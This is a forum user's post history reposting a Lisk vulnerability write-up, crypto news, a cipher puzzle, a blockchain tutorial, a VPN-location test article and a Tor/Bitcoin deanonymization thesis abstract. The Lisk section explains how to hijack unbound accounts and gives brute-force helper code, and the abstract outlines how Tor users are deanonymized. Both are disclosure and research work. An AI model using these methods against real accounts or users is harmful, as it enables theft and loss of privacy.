Everything posted by Usr6
-
I’ve been reviewing the source code of a number of blockchain thingies, both for paid audits and for fun in my spare time, and I routinely find real security issues. In this post I’ll describe a vulnerability I noticed a while ago, and now that Lisk finally describes it and warns its users, I can comment on its impact and exploitability. TL;DR: you can hijack certain Lisk accounts and steal all their balance after only 2^64 evaluations of the address generation function (a combination of SHA-256, SHA-512, and a scalar multiplication over Ed25519’s curve).

What is Lisk?

In blockchain-speak, Lisk is yet another platform for building decentralized applications. To simplify, Lisk is a kind of Ethereum where contracts are written in JavaScript—instead of Solidity or Viper—and where the consensus protocol relies on proof-of-stake instead of proof-of-work. More precisely, Lisk uses a delegated proof-of-stake (DPoS) protocol, wherein a limited number of nodes, chosen by users through a voting mechanism, actually validate transactions. Having only a limited number (101) of validators speeds up transaction validation while keeping Lisk kinda decentralized. As I’m writing this, Lisk is ranked 19th on coinmarketcap, with a market cap of approximately 3.4 billion dollars.

First problem: short addresses

Like in any cryptocoin platform, coin owners are identified by an address. In Lisk, addresses are 64-bit numbers, such as 3040783849904107057L. Whereas in Bitcoin, for example, an address is simply a hash of one’s public key, a Lisk address is derived deterministically from a passphrase, while generating the user’s keypair along the way. In more detail, it works like this: given a passphrase, compute a 256-bit seed as seed = SHA-256(passphrase); derive an Ed25519 keypair from this seed, which involves computing SHA-512(seed) and a scalar multiplication; compute the SHA-256 hash of the public key, and define the address as the last 8 bytes of the 32-byte hash. Now you can guess part of the problem: you can find a preimage of any address in approximately 2^64 evaluations of the above series of operations.

Second problem: no address–key binding

Ideally, short addresses shouldn’t be a huge problem: if an address already exists and is bound to a key pair, you shouldn’t be able to hijack the account by finding another passphrase/keypair mapping to this address. And that’s the second problem: an address isn’t bound to a keypair until it has sent money to another address (or voted for a delegate). What this means is that if an account only receives money but never sends any, then it can be hijacked by finding a preimage—and once the attacker has found a preimage, they can lock the original user out of their account by issuing a transaction and binding the address to their new passphrase/keypair. I don’t know how many accounts are vulnerable, but it’s easy to find some: just by browsing through the top accounts list, you can for example find a vulnerable account that holds more than 1.6 million Lisk units (or $48M)—look for an account with no associated public key.

Exploitation and mitigation

Running the 2^64 address computations isn’t instantaneous though; because it involves a key generation operation, these 2^64 operations are considerably slower than (say) 2^64 evaluations of a hash function like SHA-256. But completing the attack within a month will clearly cost you less than $48M.
And of course in practice you’ll parallelize the attack on N cores, and you’ll target one-of-M addresses, so the expected running time will only be around 2^63/(NM) operations. With only 64 targets and 256 cores, we’re talking of 2^49 iterations. As Lisk now recommends, “it’s important to broadcast the correct public key to the network for any given Lisk address. This can be done by simply sending at least one transaction from a Lisk account.” I don’t know whether this vulnerability has been exploited, but yet again this shows that blockchain systems security is a vastly unexplored area, with a lot of unaudited architectures and source code, and new bug classes to be found and exploited.

PoC||GTFO

I’ve tested that the attack works, by first finding a collision (two passphrases/keypairs mapping to the same address), creating an account using the first passphrase, receiving money to this address, and then hijacking the account using the second passphrase. I also simulated a real preimage attack to estimate the cost of the attack on my machine (can’t find the numbers though, it was a while ago). If you’re interested in benchmarking this, the following code can be useful (combined with an optimized implementation of Ed25519’s arithmetic):

// sha512, SHA256, sc25519_* and ge25519_* are provided by the SHA and
// optimized Ed25519 implementations being benchmarked
#define N 16

// generates a pub key from a 32-byte seed
int pubkeyFromSeed(unsigned char *pk, const unsigned char *seed)
{
    unsigned char az[64];
    sc25519 scsk;
    ge25519 gepk;

    sha512(az, seed, 32);
    az[0] &= 248;
    az[31] &= 127;
    az[31] |= 64;

    sc25519_from32bytes(&scsk, az);
    ge25519_scalarmult_base(&gepk, &scsk);
    ge25519_pack(pk, &gepk);

    return 0;
}

// computes raw pub key from utf-8 secret
static inline void pubkeyFromSecret(const char *secret, size_t secretlen, uint8_t *pk)
{
    // first hash secret
    uint8_t seed[32];
    SHA256((const unsigned char*)secret, secretlen, seed);
    pubkeyFromSeed(pk, seed);
}

// computes raw address from raw pubkey
static inline void addressFromPubkey(const uint8_t *pk, uint8_t *address)
{
    uint8_t hash[32];
    SHA256(pk, 32, hash);
    for(int i=0; i<N/2; ++i)
        address[i] = hash[7-i];
}

string addrToStr(unsigned long long a)
{
    stringstream ss;
    ss << hex << setw(16) << setfill('0') << a;
    return ss.str();
}

// address is N/2-byte long
unsigned long long addressToInt(uint8_t *address)
{
    unsigned long long addressint = 0;
    for(int i=0; i<N/2; ++i) {
        addressint |= (uint64_t)address[i] << (56 - (i*8));
    }
    return addressint;
}

// tested to match /api/accounts/open
unsigned long long addressFromSecret(unsigned long long in)
{
    uint8_t pk[32];
    uint8_t address[N/2];
    string s = addrToStr(in);
    pubkeyFromSecret(&s[0u], N, pk);
    addressFromPubkey(pk, address);
    return addressToInt(address);
}

And there’s more: secret keys aren’t secret

Ah, and there’s another security issue in Lisk: looking at the client API documentation, you’ll notice that clients need to send their passphrase (the secret value) to open an account or to send a transaction. In other words, Lisk is missing the whole point of public-key cryptography, which is to keep secret keys secret. Oh, and there’s even an endpoint (/api/accounts/open) that allows you to request your public key given your secret key. So much for trustlessness and decentralization.

Sursa: https://research.kudelskisecurity.com/2018/01/16/blockchains-how-to-steal-millions-in-264-operations/
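For readers who want to follow the derivation without the C toolchain, here is a rough Python sketch of the same address computation (not Lisk’s production code). It assumes the third-party PyNaCl package for the Ed25519 step and mirrors the benchmark code above, which takes the first 8 bytes of the final hash, reversed, as the numeric address.

import hashlib
from nacl.signing import SigningKey

def lisk_address(passphrase: str) -> str:
    seed = hashlib.sha256(passphrase.encode("utf-8")).digest()   # step 1: SHA-256 of the passphrase
    public_key = bytes(SigningKey(seed).verify_key)              # step 2: Ed25519 keypair (SHA-512 + scalar mult)
    digest = hashlib.sha256(public_key).digest()                 # step 3: SHA-256 of the public key
    # as in the C benchmark above: first 8 bytes of the hash, read as a little-endian integer
    return str(int.from_bytes(digest[:8], "little")) + "L"

print(lisk_address("this is an example passphrase"))             # arbitrary example input

Iterating this function over candidate passphrases or seeds until the output matches a target address is exactly the 2^64 preimage search described above.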
-
-
Romania is entering the world of virtual currencies and will soon launch its first cryptocurrency. Behind the project are IT specialists encouraged by the success of Bitcoin, which has seen accelerated growth in recent years. Cryptocurrencies are not issued by a bank but by a virtual platform, through an extremely complex process. Their value rises or falls depending on market demand.

Adrian Stratulat, lead evangelist: The idea behind cryptocurrencies was to decentralize the monetary system, so that we no longer have a single institution setting monetary policy for an entire society.

Virtual money is obtained through a process called mining, in which high-performance computers connected to the virtual platform solve complex mathematical problems. The harder the problems, the higher the value of the resulting coin.

Adrian Stratulat, lead evangelist: There are certain types of mining that rely more on memory or the CPU, others that use the GPU, and others that favour hardware devices specialized for mining.

Adrian Stratulat, lead evangelist: There are exchanges, places where you can take a cryptocurrency and convert it into real currency, into euros, lei or dollars.

The digital wallets that hold cryptocurrencies are very secure and cannot be broken into by cybercriminals, say those who work with such platforms.

Alexandru Ionuţ Budişteanu, lead developer: There are mathematical algorithms behind them that give cryptocurrencies enormous security.

Romanian IT specialists are now preparing to launch the first Romanian cryptocurrency. They want their coin to be usable by anyone, regardless of whether or not they have technical knowledge.

Ionuţ Alexandru Panait, lead platform developer: If until now you needed to download 200 GB and have programming knowledge in order to mine from a terminal, the concept we are bringing to the market lets you do the same thing just by opening your browser and finding our platform.

The first cryptocurrency, Bitcoin, was created in 2009, and the phenomenon keeps growing.

Sursa: https://www.digi24.ro/stiri/sci-tech/lumea-digitala/prima-moneda-virtuala-romaneasca-860158
-
Name: TheBodyguard.jpg
MD5: 1593E87EA6754E3960A43F6592CC2509

import string

alfabet = string.ascii_lowercase
alfabet2 = string.ascii_uppercase

parola = "?"
plain_text = ""
for i in parola:
    if i in alfabet:
        plain_text += i

def enc1(text):
    ret = ""
    for i in text:
        tmp = alfabet.find(i)
        if tmp != -1:
            ret += alfabet2[(tmp + 3) % 26]
    return ret

def enc2(t1, t2):
    ret = ""
    for i in range(len(t1)):
        ret += str(ord(t1[i]) + ord(t2[i])) + ","
    return ret

print "You need this:", enc2(parola, enc1(parola))

Output: You need this:201,203,165,195,165,191,205,187,181,191,173,187,173,187,193,199,
-
While this setup of Kali on Windows is not optimal due to various environmental restrictions (such as the lack of raw sockets and lack of customised Kali kernel), there are still many situations where having Kali Linux alongside your Windows 10 machine can be beneficial. One example that comes to mind is consolidation of workspaces, especially if Windows is your main working environment. Other useful situations that crossed our minds were standardizing tools and scripts to run across multiple environments, quick porting of Linux penetration testing command line tools to Windows, etc. For example, below is a screenshot of running the Metasploit Framework from Kali Linux, over WSL. Link: https://www.kali.org/tutorials/kali-on-the-windows-subsystem-for-linux/
-
-
Introduction

Bitcoin and cryptocurrencies made a lot of noise lately. I have been rather disappointed by the turn the cryptocurrencies took, from an amazing concept to what seems just another way to make quick money (or not...). But I became very interested in the technologies enabling cryptocurrencies, and obviously in the concept of a blockchain. The concept is fascinating, and not limited to Bitcoin and friends. We could imagine many applications for such a technology. So, in a proper developer manner, I decided to code a blockchain, or what I think is a blockchain, to understand better what it is.

A simple project

So, what do we need to create a very simple blockchain?

A block: A block is what the blockchain is made of. In our case, a block will be composed of a date, an index, some data (a message in our case), and the hash of the previous block.

Cryptography: To keep information secure, we need to encrypt our data. For our little project, we will use the js-sha256 package. This process will create a string of 64 characters. Ultimately, our blockchain will be a series of hashes, each composed of 64 characters. As I said earlier, we use the hash of the previous block to encrypt a new block (that is why we call it a chain).

Difficulty and nonce: We don't just create one hash per block and that's it. A hash must be valid. In our case, a hash will be valid if the first four characters of our hash are 0. If our hash starts with '0000......', it is considered valid. This is called the difficulty. The higher the difficulty, the longer it takes to get a valid hash. But if the hash is not valid the first time, something must change in the data we use, right? If we use the same data over and over, we will get the same hash over and over and our hash will never be valid. You are right, we use something called a nonce in our hash. It is simply a number that we increment each time the hash is not valid. We get our data (date, message, previous hash, index) and a nonce of 1. If the hash we get with these is not valid, we try with a nonce of 2. And we increment the nonce until we get a valid hash.

Genesis block: There must be a first block in our chain. It is called the genesis block. Of course, this block can't use the hash of the previous block because it doesn't exist. We will just give it some arbitrary data to create its hash. And that is pretty much what we need for our blockchain.

The methods

We will need a few methods to make a functional blockchain:
- initialize our blockchain => creates the genesis block
- hash our blocks => a function responsible for creating a valid hash
- check the validity of a hash => does our hash start with '0000'?
- get the last hash => we need the previous hash to create a new block
- add a new block => we need to do that at one point, if we want a chain

THE COOOOODE !!

Let's get coding now. For this little project, I will create two files, one called index.js and another called blockchain.js. The second one will hold our little module to create a blockchain. It's straightforward, let's take a look at it:

const sha256 = require('js-sha256').sha256

const blockchain = (function(){
  const blocks = []

  const initBlockchain = () => {
    console.log('Initializing the blockchain')   // matches the output shown below
    const data = 'Hello World!'
    const timestamp = new Date()
    const previousHash = 0
    const index = 0
    hashBlock(data, timestamp, previousHash, index)
  }

  const hashBlock = (data, timestamp, prevHash, index) => {
    let hash = '', nonce = 0
    while( !isHashValid(hash) ){
      let input = `${data}${timestamp}${prevHash}${index}${nonce}`
      hash = sha256(input)
      nonce += 1
    }
    console.log(nonce)
    blocks.push(hash)
  }

  const getLastHash = blocks => blocks.slice(-1)[0]

  const isHashValid = hash => hash.startsWith('0000') // Difficulty

  const addNewBlock = data => {
    const index = blocks.length
    const previousHash = getLastHash(blocks)
    hashBlock(data, new Date(), previousHash, index)
  }

  const getAllBlocks = () => blocks

  return {
    initBlockchain,
    getLastHash,
    blocks,
    getAllBlocks,
    addNewBlock
  }
})()

module.exports = blockchain

So, in this module, I have a few methods. At the top, I import the module that will handle the cryptography part. I have an empty array that will hold my blockchain's blocks, called blocks.

initBlockchain: This method starts the blockchain by creating the first block, the genesis block. I give it a timestamp, a message, the block's index in the blockchain (0) and an arbitrary previous hash because there are no previous blocks in the chain yet. With all this information, I can now create the hash for the genesis block.

hashBlock: This method takes all the block's data and creates a hash. As you can see, the first time we run the function for a specific block, the nonce is set to 0. We encrypt our block and check if the hash is valid with isHashValid. In our case, a hash is valid if the four first characters are 0. This is called the difficulty. This is the problem we have to solve to make sure the block can be part of the blockchain. Once the hash is valid, we add it to our blocks array.

addNewBlock: This method is responsible for creating a new block. We only need to give it the message as an argument, because all the other arguments (index, previousHash, and timestamp) can be found in the blockchain. The method calls hashBlock with the data to create and validate the new block.

getLastHash: The method I call to get the previous hash. We always need the previous hash to create a new block.

getAllBlocks: Just returns all the blocks currently in the blockchain.

Great, so let's move to index.js to use our new blockchain!

const blockchain = require('./blockchain')

blockchain.initBlockchain()
blockchain.addNewBlock('First new block')
blockchain.addNewBlock('I love blockchains')
blockchain.addNewBlock('Make me a new hash!!')
console.log(blockchain.getAllBlocks())

We initialize our blockchain, then we create three new blocks. When I run this, I get the following chain in response:

Initializing the blockchain
139355
30720
68789
51486
[ '0000d87875f12e8c00d60cdfc8c21c4867eb1e732d3bb0e4d60bd0febcfafbaf',
  '0000331d80f4e83461bad846e082baa08c5e739edfa19a4880c1dcbe4eed1984',
  '00000dcab247410050e357158edc20555cc0110429023fdadb1d8cda3e06da5e',
  '0000a16968811cf75c33d877e99f460d396c46b5485f669c8e55b193b862106d' ]

The array represents the four blocks. As you can see, every single one of them starts with four zeros, so every single hash is valid. If one of those hashes didn't start with four zeros, I would know right away the hash was invalid, and therefore the data in the corresponding block should probably not be trusted. There are four numbers here: 139355, 30720, 68789, 51486. These are the nonces for each block. I printed them out to see how many times the function hashBlock ran to arrive at a valid hash.
The first block, the genesis block, ran 139355 times before having a valid hash! The second, 30720 times. The third 68789 times and the fourth 51486 times.

Conclusion

This is a very simple example of a blockchain. I'm pretty sure I missed a few things here. I also kept things pretty simple because hey, I'm learning! This little project made me understand a few things: If one person decides to modify a previous block, she would have to change every single block after that one. Each block inherits from its parent (previous hash), so trying to cheat a blockchain seems complicated. But if a majority of the blockchain's users decide to cheat, they could modify a previous block and all agree to change the rest of the blockchain accordingly. A blockchain seems to work only if the majority decides to follow the rules. Or you could end up with two different blockchains, one where the users decided to stick with the original data, and the other where the users decided to use the modified blockchain. I've heard about Bitcoin's enormous use of power when it comes to mining. Mining is the concept of solving the difficulty problem when you encrypt the data. You get the transaction and you try to find a valid hash for that block. As a reward for your effort, you get some bitcoin. I can only imagine the amount of power you would use when the blockchain becomes huge. Well, that's about what I got from that. It made things a lot clearer for me. Feel free to correct me if I got things wrong!

Sursa: https://dev.to/damcosset/trying-to-understand-blockchain-by-making-one-ce4
-
-
"doar sa faci pe inteligentul" insinuezi ca nu sunt?
-
Since you stayed on the forum, I deduce that you consider yourself smart. Even though you can't accept anything other than your own opinions, I'd like to make a few small observations about the text you posted: - "fac pe Dumnezeii pe aici." ("they act like Gods around here") - there is only one God. - "au ramai" -> au ramas - after the period at the end of a sentence, leave a space before starting the next sentence - "Cand apare cate unul care nu are habar de o chestie sau cere ceva, este huduit si injurat in loc sa i se explice problema frumos" ("when someone shows up who has no clue about something or asks for something, they get jeered at and sworn at instead of having the problem explained to them nicely") - there are many people on this forum who work in IT; imagine you were a sysadmin/net admin/red & blue team etc. and you saw a topic where someone asks about scanning RDP, roots, SSH, SMTP, Telnet, etc. How would you react? If you were a moderator/admin, whose side would you be on?
-
Do VPNs really have all the servers they claim in exotic locations all over the world? In many cases, the answer is no. The true location of some VPN servers may be entirely different. In other words, a server that is allegedly in Pakistan is actually in Singapore. Or a server that should be in Saudi Arabia is actually in Los Angeles, California. (Both are real examples from below.) This is known as spoofing the true location. Why is this important? First, the performance may suffer if the actual server is significantly further away. Second, it’s bad if you are trying to avoid certain countries (such as the UK or US) where the server may be located. Third, customers aren’t getting the true server locations they paid for. And finally, using fake server locations raises questions about the VPN’s honesty. In this article we’ll take a deep dive into the topic of fake VPN server locations. The point here is not to attack any one VPN provider, but instead to provide honest information and real examples in order to clarify a confusing topic. We will cover four main points: VPN server marketing claims Fake server locations with ExpressVPN (11 are identified) Fake server locations with PureVPN (5 are identified, but there are many more) How to test and find the true location of VPN servers But before we begin, you might be asking yourself, why do VPNs even use fake server locations? The incentives are mainly financial. First, it saves lots of money. Using one server to fake numerous server locations will significantly reduce costs. (Dedicated premium servers are quite expensive.) Second, advertising numerous server locations in a variety of countries may appeal to more people, which will sell more VPN subscriptions. Here’s how that works… My, what a larger server network you have! Most of the larger VPN providers boast of server networks spanning the entire world. This seems to be the trend – they are emphasizing quantity over quality. Take Hidemyass for example and their server network claims: If you think there are physical servers in 190+ countries, I have a bridge to sell you! Upon closer examination of Hidemyass’s network, you find some very strange locations, such as North Korea, Zimbabwe, and even Somalia. But reading further, it becomes clear that many of these locations are indeed fictitious. Hidemyass refers to these fictitious server locations as “virtual locations” on their website. Unfortunately, I could not find a public server page listing all server URLs, so I could not test any of the locations. However, the Hidemyass chat representative I spoke with confirmed they use “virtual” locations, but could not tell me which locations were fake and which were real. PureVPN is another provider that admits to using fake locations, which they refer to as “virtual servers” – similar to Hidemyass. (We will take a closer look at PureVPN below, with testing results for the servers that are not classified as virtual.) ExpressVPN also boasts of a large server network. Unlike with PureVPN and Hidemyass, ExpressVPN does not admit to using fake locations anywhere on its website. The ExpressVPN chat representative I spoke with claimed that all server locations were real. (This was proven through testing to be false.) Testing shows that many of ExpressVPN’s server locations are fake. Just like with Hidemyass and PureVPN, testing results show that ExpressVPN is using fictitious server locations, which we will cover in detail below. 
Testing VPN server locations With free network-testing tools, you can quickly find the true location of a VPN server. This allows you to cross-check dubious server locations with a high degree of accuracy. For every VPN server examined in this article, I used three different network-testing tools to verify the true location beyond any reasonable doubt: CA App Synthetic Monitor ping test (ping test from 90 different worldwide locations) CA App Synthetic Monitor traceroute (tests from various worldwide locations) Ping.pe (ping test from 24 different worldwide locations) First, I used this ping test, which pings the VPN server from 90 different worldwide locations. This allows you to narrow down the location with basic triangulation. In general, the lower the time (ms), the closer the server is to a given location. Pretty simple and accurate. Second, I ran traceroutes from various locations based on the results in the first test. This allows you to measure the distance along the network to the final VPN server. With ExpressVPN, for example, I could run a traceroute from Singapore and find that the VPN server is about 2 ms away, which means it is also located in Singapore. Third, I used another ping test to again ping the VPN server from different worldwide locations. This tool also includes traceroutes for each location (MTR). Note: When running traceroutes or ping tests, you may have some outlier test results due to different variables with the network and hops. That’s why I recommend running multiple tests with all three of the tools above. This way, you will be able to eliminate outlier results and further confirm the true server location. With every fictitious server location found in this article, all three tools strongly suggested the exact same location. If there was any doubt, I did not label the server as “fake” below. ExpressVPN server locations As we saw above, ExpressVPN boasts a large number of servers on their website in some very interesting locations. In the map below you can see many of their southeast Asia server locations in red boxes. These are all the locations that were determined to be fictitious after extensive testing, with the actual server being located in Singapore. Every ExpressVPN server location in a red box was found to be fake after extensive testing. ExpressVPN does not make any of their server URLs publicly available. So to obtain the server URL, you need to have an ExpressVPN account, then go into the member area and download the manual configuration files. In total, I found 11 fake VPN server locations with ExpressVPN. Below I will show you the test results for one location (Pakistan). You can find the other test results in the Appendix to this article. ExpressVPN’s Pakistan server (Singapore) URL: pakistan-ca-version-2.expressnetw.com Test 1: Ping times from different worldwide locations reveal the server is much closer to Singapore than to Bangalore, India. If the server was truly in Pakistan, this would not make much sense. … At only 2 milliseconds ping (distance), this “Pakistan” server is without a doubt in Singapore. But to further prove the location, we can run a few more tests. Test 2: Running a traceroute from Singapore to the “Pakistan” VPN server, we can once again verify that this server is in Singapore, at about 2 ms ping. Looking at every hop in the traceroute gives you the full picture of the network path. This shows how much distance (time) is between the final VPN server and the traceroute location. 
At around 2 ms, this server is clearly in Singapore. Just for fun, we will run one more test, even though it is already clear where the server is located. Test 3: Here is another ping test using the website ping.pe. The Pakistan server location is undoubtedly fictitious (spoofed). The real location is in Singapore. One other sign you see with ExpressVPN’s fake server locations is that the second-to-last IP address in the traceroute (before the final hop) is always the same. With all the fake server locations in Asia you find this IP address before the final hop: 174.133.118.131 With a traceroute you can see that the final (spoofed) server is always very close to the IP address above. This is simply more evidence pointing to the obvious conclusion that Singapore is the true location of all these servers. In addition to Pakistan, here are the other fictitious server locations found with ExpressVPN: Nepal Bangladesh Bhutan Myanmar Macau Laos Sri Lanka Indonesia Brunei Philippines Note: there may be more fake locations, but I did not have time to test every server. Update: Six days after publishing this article ExpressVPN has admitted to numerous fake locations on its website (mirror) – 29 fictitious locations in total. Just like PureVPN and Hidemyass, ExpressVPN refers to these as “virtual” server locations. PureVPN server locations PureVPN has quite a few fake server locations. On the PureVPN server page you find that many of the servers begin with “vl” which seems to stand for “virtual location”. You find two different types of these prefixes: vleu (which probably stands for virtual location Europe) and vlus (which likely means virtual location US). Every “vl” location I tested was indeed fake (or “virtual” as they like to call it). But I also found that many of their non-virtual locations are also fake, such as Aruba and Azerbaijan in the screenshot above. Here is one example: PureVPN’s Azerbaijan server (United Kingdom) URL: az1-ovpn-udp.pointtoserver.com The ping test clearly shows this server location to be in the United Kingdom – in close proximity to Edinburgh. Furthermore, the ping times for Turkey (which is close to Azerbaijan) are much higher than the UK. The server location is already clear; it is located in the UK. But to further verify the location beyond doubt, I ran a traceroute from Edinburgh, UK to the “Azerbaijan” server: At around 2 milliseconds, this server is without a doubt in the United Kingdom, not Azerbaijan. In addition to Azerbaijan, I also found four other fake “non-vl” server locations with PureVPN: Aruba Saudi Arabia Bahrain Yemen Note: I did not spend much time testing PureVPN server locations because it was clear that many locations were fake. Consequently, I only chose five examples for this article. How to find the real VPN server location Determining the real location of a VPN server is quick and easy with the five steps below. Step 1: Obtain the VPN server URL or IP address You should be able to find the URL or IP address of the VPN server in the members area. You may need to download the VPN configuration file for the specific location, and then just open the file and get the URL for the server. Some VPNs openly provide this information on their server page. Here I downloaded the OpenVPN configuration file for the ExpressVPN Nepal server. After opening the file, I find the server URL near the top. Now copy the URL of the VPN server for step 2. 
Step 2: Ping the VPN server from different worldwide locations Use this free tool from CA App Synthetic Monitor to ping the VPN server from about 90 different worldwide locations. Enter the VPN server URL (or IP address) from step 1 into the box and hit Start. It will take a few seconds for the ping results to show. Step 3: Examine results to determine actual location Now you can examine the results, looking for the lowest ping times to determine the closest server. You may want to have a map open to examine which server should have the lowest ping based on geographical distance. From all of the testing locations, Bangalore, India should have the lowest ping due to its close proximity to Nepal. But if you look at all the results, you may find that the exact location of the server is somewhere else. Looks like we have a winner. This VPN server is located in Singapore – NOT Nepal. At this point it is clear that the server location is in Singapore, and not Nepal (for this example). But just to verify these results, we will run some more tests. Step 4: Run a few traceroute tests You can further probe the exact location by running a traceroute test. This is simply a way to measure the time it takes for a packet of data to arrive at the server location, across the different hops in the network. There are different options for traceroute testing, such as the Looking Glass from Hurricane Electric. My preferred method is to use this traceroute tool from CA App Synthetic Monitor and then select the location to run the traceroute from. First, you can run the traceroute from a location that should be the closest to the server location. In this case, that would be New Delhi, which is the closest location I can find to Nepal. Just enter the VPN server URL and select your test location for the traceroute. Now we will run another traceroute, but this time from Singapore. We have a winner: Singapore. It is now clear that this ExpressVPN Nepal server is located in Singapore. But you can also cross check with one more test. Step 5: Run another ping test Just like in step 2, Ping.pe will ping the VPN server from different worldwide locations, allowing you to narrow down the likely location. This tool will continuously ping the server and calculate the average time for every location. Furthermore, it will run traceroutes for every location, allowing you to further verify the location. As before, simply enter the VPN server URL and hit Go. The ping results will continuously populate in the chart. Once again, the results clearly show this server is in Singapore. No doubt about it. Now we can see beyond all doubt, this VPN server is located in Singapore, not Nepal. Controlling for variables With every fake server location I found, all three tools strongly suggested the same location. Nonetheless, you may still get some outlier results due to different variables and hops in the network. To control for variables and easily eliminate these outliers, simply run multiple tests with all three tools. You should find the results to be very consistent, all pointing to the same location. Conclusion on fake VPN server locations Dishonesty is a growing problem with VPNs that more people are starting to recognize. From fake reviews to shady marketing tactics, false advertising, and various VPN scams, there’s a lot to watch out for. Fake VPN servers are yet another issue to avoid. Unfortunately with all the deceptive marketing, it can be difficult to find the true facts. 
Most VPNs emphasize the size of their server network rather than server quality. This quantity over quality trend is obvious with most of the larger VPN providers. On the opposite end of the spectrum are smaller VPN services that have fewer locations, but prioritize the quality of their server network, such as Perfect Privacy and VPN.ac. Some VPN users may not care about fake servers. Nonetheless, fake VPN servers can be problematic if you: are trying to avoid specific countries are trying to optimize VPN performance (which may be affected by longer distances) are trying to access restricted content (fake locations may still be blocked) expect the server to be where the VPN says it is (honesty) With the tools and information in this article, you can easily verify the location of any VPN server, which removes the guesswork completely. Appendix (testing results) ExpressVPN Nepal (Singapore) URL: nepal-ca-version-2.expressnetw.com And now running a traceroute to the “Nepal” server from Singapore: This “Nepal” server is located in Singapore. ExpressVPN Bhutan (Singapore) URL: bhutan-ca-version-2.expressnetw.com And now running a traceroute to the “Bhutan” server from Singapore: Once again, ExpressVPN’s “Bhutan” server is located in Singapore. ExpressVPN Sri Lanka (Singapore) URL: srilanka-ca-version-2.expressnetw.com Here’s the traceroute to the “Sri Lanka” server from Singapore: The “Sri Lanka” server is actually in Singapore. ExpressVPN Bangladesh (Singapore) URL: bangladesh-ca-version-2.expressnetw.com Here’s the traceroute to the “Bangladesh” server from Singapore: It is easy to see that the “Bangladesh” server is located in Singapore, especially when you compare the locations using the ping test. ExpressVPN Myanmar (Singapore) URL: myanmar-ca-version-2.expressnetw.com Here’s the traceroute to the “Myanmar” server from Singapore: This VPN server is located in Singapore (also verified by the other tests). ExpressVPN Laos (Singapore) URL: laos-ca-version-2.expressnetw.com Here’s the traceroute to the “Laos” server from Singapore: This server is also clearly in Singapore. ExpressVPN Brunei (Singapore) URL: brunei-ca-version-2.expressnetw.com Here’s the traceroute to the “Brunei” server from Singapore: Once again, this is clearly in Singapore. But given the close geographic proximity of these locations, I also checked ping times from neighboring countries, such as Malaysia and Indonesia, which were all significantly higher than the ping time from Singapore. All tests pointed to the same conclusion: Singapore. ExpressVPN Philippines (Singapore) URL: ph-via-sing-ca-version-2.expressnetw.com Unlike all of the other fictitious server locations, ExpressVPN appears to be admitting the true location with the configuration file name. Below you see that the config file is named “Philippines (via Singapore)” – which suggests the true location. Here’s the traceroute to the “Philippines” server from Singapore: Just like with all the other traceroute tests, this location is also in Singapore. ExpressVPN Macau (Singapore) URL: macau-ca-version-2.expressnetw.com This was another server location that was very easy to identify as fake using the ping test. Because Hong Kong and Macau are right next to each other, the closest ping result should have been with the Hong Kong server. But instead, Hong Kong’s ping time was about 32 milliseconds and Singapore’s ping time was again around 2 milliseconds. Here is the traceroute to “Macau” from Singapore: Another fake server location, which is clearly in Singapore. 
ExpressVPN Indonesia (Singapore) URL: indonesia-ca-version-2.expressnetw.com The ping test with this location was another dead giveaway. The ping result from Jakarta, Indonesia was 198 milliseconds, and the ping result from Singapore was under 2 milliseconds. Again, case closed. Here is the traceroute from Singapore: Location: Singapore. PureVPN Aruba (Los Angeles, USA) URL: aw1-ovpn-udp.pointtoserver.com All tests show this server is located in Los Angeles, California (USA). Here is the traceroute from Los Angeles: Actual server location: Los Angeles, California PureVPN Bahrain (Amsterdam, Netherlands) URL: bh-ovpn-udp.pointtoserver.com Here is the traceroute from Amsterdam. This “Bahrain” server is undoubtedly in Amsterdam. PureVPN Saudi Arabia (Los Angeles, USA) URL: sa1-ovpn-udp.pointtoserver.com Now running the traceroute from Los Angeles, California: This “Saudi Arabia” server is in Los Angeles. PureVPN Yemen (Frankfurt, Germany) URL: ym1-ovpn-udp.pointtoserver.com Here’s the traceroute from Frankfurt: PureVPN’s “Yemen” server is clearly in Frankfurt, Germany. UPDATES HideMyAss (November 2017) – As a response, HideMyAss has told us, “We have always been open and transparent about virtual server locations and believe that the concept is explained comprehensively both on our website and in our latest software client.” However, when you examine their server locations page, it is still not clear exactly which locations are “virtual”. ExpressVPN – ExpressVPN has fully updated their server locations page to explain exactly which servers are real and which are “virtual”. They have also removed all contradictory claims about “no logs” and clarified their exact policies. You can check out the details on the ExpressVPN website here. PureVPN – We have not heard anything from PureVPN since this article was first published. However, we did recently learn that PureVPN has been providing connection logs to the FBI while still claiming to have a “zero log policy”. Sursa: https://restoreprivacy.com/vpn-server-locations/
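The article relies on third-party vantage points, but you can script a crude local version of the same check. Below is a minimal Python sketch (not a tool from the article) that measures TCP connect round-trip time to a server hostname; run it from machines in different regions, for example cheap cloud VMs, and compare the numbers, since a single measurement only tells you how far the server is from you. The hostnames are taken from the article, and port 443 is an assumption, so pick a port the server actually answers on.

import socket
import time

def tcp_rtt(host, port=443, attempts=5, timeout=5.0):
    """Return the lowest observed TCP connect time to host:port, in milliseconds."""
    best = None
    for _ in range(attempts):
        start = time.perf_counter()
        try:
            with socket.create_connection((host, port), timeout=timeout):
                elapsed = (time.perf_counter() - start) * 1000.0
        except OSError:
            continue  # connection refused or timed out on this attempt
        if best is None or elapsed < best:
            best = elapsed
    return best

for host in ["pakistan-ca-version-2.expressnetw.com", "az1-ovpn-udp.pointtoserver.com"]:
    rtt = tcp_rtt(host)
    print(host, "unreachable" if rtt is None else "%.1f ms" % rtt)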
-
-
Abstract
Al Jawaheri, Husam B., Masters: June 2017, Master of Computing
Title: DEANONYMIZING TOR HIDDEN SERVICE USERS THROUGH BITCOIN TRANSACTIONS ANALYSIS
Supervisor of Thesis: Qutaibah Malluhi

With the rapid increase of threats on the Internet, people are continuously seeking privacy and anonymity. Services such as Bitcoin and Tor were introduced to provide anonymity for online transactions and Web browsing. Due to its pseudonymity model, Bitcoin lacks retroactive operational security, which means historical pieces of information could be used to identify a certain user. We investigate the feasibility of deanonymizing users of Tor hidden services who rely on Bitcoin as a method of payment. In particular, we correlate the public Bitcoin addresses of users and services with their corresponding transactions in the Blockchain. In other words, we establish a provable link between a Tor hidden service and its user by simply showing a transaction between their two corresponding addresses. This subtle information leakage breaks the anonymity of users and may have serious privacy consequences, depending on the sensitivity of the use case. To demonstrate how an adversary can deanonymize hidden service users by exploiting leaked information from Bitcoin over Tor, we carried out a real-world experiment as a proof-of-concept. First, we collected public Bitcoin addresses of Tor hidden services from their .onion landing pages. Out of 1.5K hidden services we crawled, we found 88 unique Bitcoin addresses that have a healthy economic activity in 2017. Next, we collected public Bitcoin addresses from two 